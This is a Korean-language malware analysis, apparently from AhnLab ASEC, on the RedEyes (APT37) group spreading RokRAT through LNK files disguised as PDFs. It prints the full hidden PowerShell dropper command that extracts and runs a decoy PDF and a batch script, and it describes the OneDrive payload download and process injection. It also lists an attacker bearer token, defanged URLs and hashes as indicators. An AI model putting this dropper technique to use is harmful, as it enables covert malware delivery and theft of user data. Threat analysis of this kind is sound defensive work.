APT 악성코드

링크 파일(*.lnk)을 통해 유포되는 RokRAT 악성코드 : RedEyes(ScarCruft)

  • 4월 21 2023
링크 파일(*.lnk)을 통해 유포되는 RokRAT 악성코드 : RedEyes(ScarCruft)

AhnLab Security Emergency response Center(ASEC)은 지난 달 국내 금융 기업 보안 메일을 사칭한 CHM 악성코드를 유포한 RedEyes 공격 그룹(also known as APT37, ScarCruft)이 최근 LNK 파일을 통해 RokRAT 악성코드를 유포하는 것을 확인하였다.

RokRAT 악성코드는 사용자 정보를 수집하고 추가 악성코드를 다운로드할 수 있는 악성코드로 과거 한글 문서 및 워드 문서를 통해 유포된 이력이 존재한다. 이번에 확인된 LNK 파일은 내부에 파워쉘 명령어를 포함하고 있으며 temp 경로에 정상 파일과 함께 스크립트 파일을 생성 및 실행하여 악성 행위를 수행한다. 확인된 LNK 파일명은 다음과 같다.

  • 230407정보지.lnk
  • 2023년도 4월 29일 세미나.lnk
  • 2023년도 개인평가 실시.hwp.lnk
  • 북 외교관 선발파견 및 해외공관.lnk
  • 북한외교정책결정과정.lnk

‘230407정보지.lnk’ 파일은 PDF 아이콘으로 위장하고 있으며 악성 파워쉘 명령어를 포함하고 있다.

그림 1. LNK 파일 속성

LNK 파일 내부에는 파워쉘 명령어 뿐만 아니라 정상 PDF 파일 데이터와 악성 스크립트 코드가 존재한다. 또한, 0x89D9A 위치부터 파일 끝까지 0x141702A 크기 만큼의 더미 바이트가 존재한다.

그림 2. LNK 파일 끝에 존재하는 더미 데이터

LNK 파일 실행 시 cmd.exe를 통해 실행되는 파워쉘 명령어는 다음과 같다.

/c powershell -windowstyle hidden $dirPath = Get-Location; if($dirPath -Match ‘System32’ -or $dirPath -Match ‘Program Files’) {            $dirPath = ‘%temp%’            }; $lnkpath = Get-ChildItem -Path $dirPath -Recurse *.lnk ^| where-object {$_.length -eq 0x00014A0DC4} ^| Select-Object -ExpandProperty FullName; $pdfFile = gc $lnkpath -Encoding Byte -TotalCount 00561396 -ReadCount 00561396; $pdfPath = ‘%temp%\230407정보지.pdf’; sc $pdfPath ([byte[]]($pdfFile ^| select -Skip 002474)) -Encoding Byte; ^& $pdfPath; $exeFile = gc $lnkpath -Encoding Byte -TotalCount 00564634 -ReadCount 00564634; $exePath = ‘%temp%\230412.bat’; sc $exePath ([byte[]]($exeFile ^| select -Skip 00561396)) -Encoding Byte; ^& $exePath;

LNK 파일을 0x890F4바이트 만큼 읽고 처음 0x9AA를 바이트 제외하여 TEMP 폴더에 ‘230407정보지.pdf’ 파일명으로 저장 및 실행한다. 이후 또 다시 LNK 파일을 0x89D9A만큼 읽고 PDF 데이터가 존재하는 0x890F4 바이트를 제외한 나머지를 TEMP 폴더에 ‘230412.bat’ 파일명으로 저장하고 실행한다.

그림 3. LNK 파일의 0x9AA 위치에 존재하는 PDF 데이터

그림 4. LNK 파일의 0x890F4 위치에 존재하는 스크립트 코드

그림 5. TEMP 경로에 생성된 파일

공격자는 정상 PDF 파일을 실행하여 사용자가 정상적인 PDF 파일을 실행한 것처럼 보이도록 한 뒤 스크립트 파일을 통해 악성 행위를 수행한다.

그림 6. 230407정보지.pdf(정상 파일)

함께 실행된 스크립트 파일에는 다음과 같이 HEX값으로 존재하는 악성 명령어를 실행하는 파워쉘 명령어가 존재한다.

그림 7. 230412.bat

최종적으로 실행되는 파워쉘 명령어는 다음과 같이 hxxps://api.onedrive[.]com/v1.0/shares/u!aHR0cHM6Ly8xZHJ2Lm1zL2kvcyFBaFhFWExKU05NUFRiZnpnVU14TmJJbkM2Q0k_ZT1WZElLSjE/root/content 에서 인코딩된 데이터를 다운로드하며 이를 디코딩 후 powershell 프로세스에 인젝션하여 악성 행위를 수행한다.

그림 8. 최종 실행되는 파워쉘 명령어

그림 9. onedrive에 업로드된 악성 파일

인젝션된 데이터는 RokRAT 악성코드로 사용자 정보 수집 및 추가 악성 파일을 다운로드할 수 있다. 수집된 정보는 pcloud, yandex 등의 클라우드 서비스를 사용하여 공격자의 클라우드 서버로 전송되며 요청 헤더의 UserAgent는 Googlebot으로 위장하였다. 파일 전송에 사용되는 인증 토큰 정보는 다음과 같다.

  • Authorization: Bearer RSbj7Zk5IYK5ThSbQZH4YBo7ZxiPOCH94RBbFuU9c04XXVJg7xbvX

추가 확인된 악성 LNK 파일을 통해 실행되는 정상 문서는 다음과 같다.

그림 10. 2023년도 4월 29일 세미나.lnk를 통해 생성된 2023년도 4월 29일 세미나.pdf

그림 11. 북한외교정책결정과정.lnk를 통해 생성된 230402.hwp

RokRAT 악성코드는 과거부터 꾸준히 유포되고 있으며 워드 문서 뿐만 아니라 다양한 형식의 파일을 통해 유포가 되고 있는 만큼 사용자의 각별한 주의가 필요하다.

 

 [파일 진단] 
Dropper/LNK.Agent (2023.04.08.00) 
Downloader/BAT.Agent (2023.04.08.00)

 

MD5

0f5eeb23d701a2b342fc15aa90d97ae0
461ce7d6c6062d1ae33895d1f44d98fb
657fd7317ccde5a0e0c182a626951a9f
8e5cac0159a31ea808973508ce164e1d
aa8ba9a029fa98b868be66b7d46e927b
URL

https[:]//1drv[.]ms/i/s!AhXEXLJSNMPTbfzgUMxNbInC6
https[:]//api[.]onedrive[.]com/v1[.]0/shares/u!aHR0cHM6Ly8xZHJ2Lm1zL2kvcyFBaFhFWExKU05NUFRiZnpnVU14TmJJbkM2Q0k_ZT1WZElLSjE/root/content
https[:]//api[.]onedrive[.]com/v1[.]0/shares/u!aHR0cHM6Ly8xZHJ2Lm1zL3UvcyFBdTJteTF4aDZ0OFhnUjJNem1zOG5oUndvLTZCP2U9akhIQzZ5/root/content

AhnLab TIP를 구독하시면 연관 IOC 및 상세 분석 정보를 추가적으로 확인하실 수 있습니다. 자세한 내용은 아래 배너를 클릭하여 확인해보세요.

Tags:
Previous Post

Next Post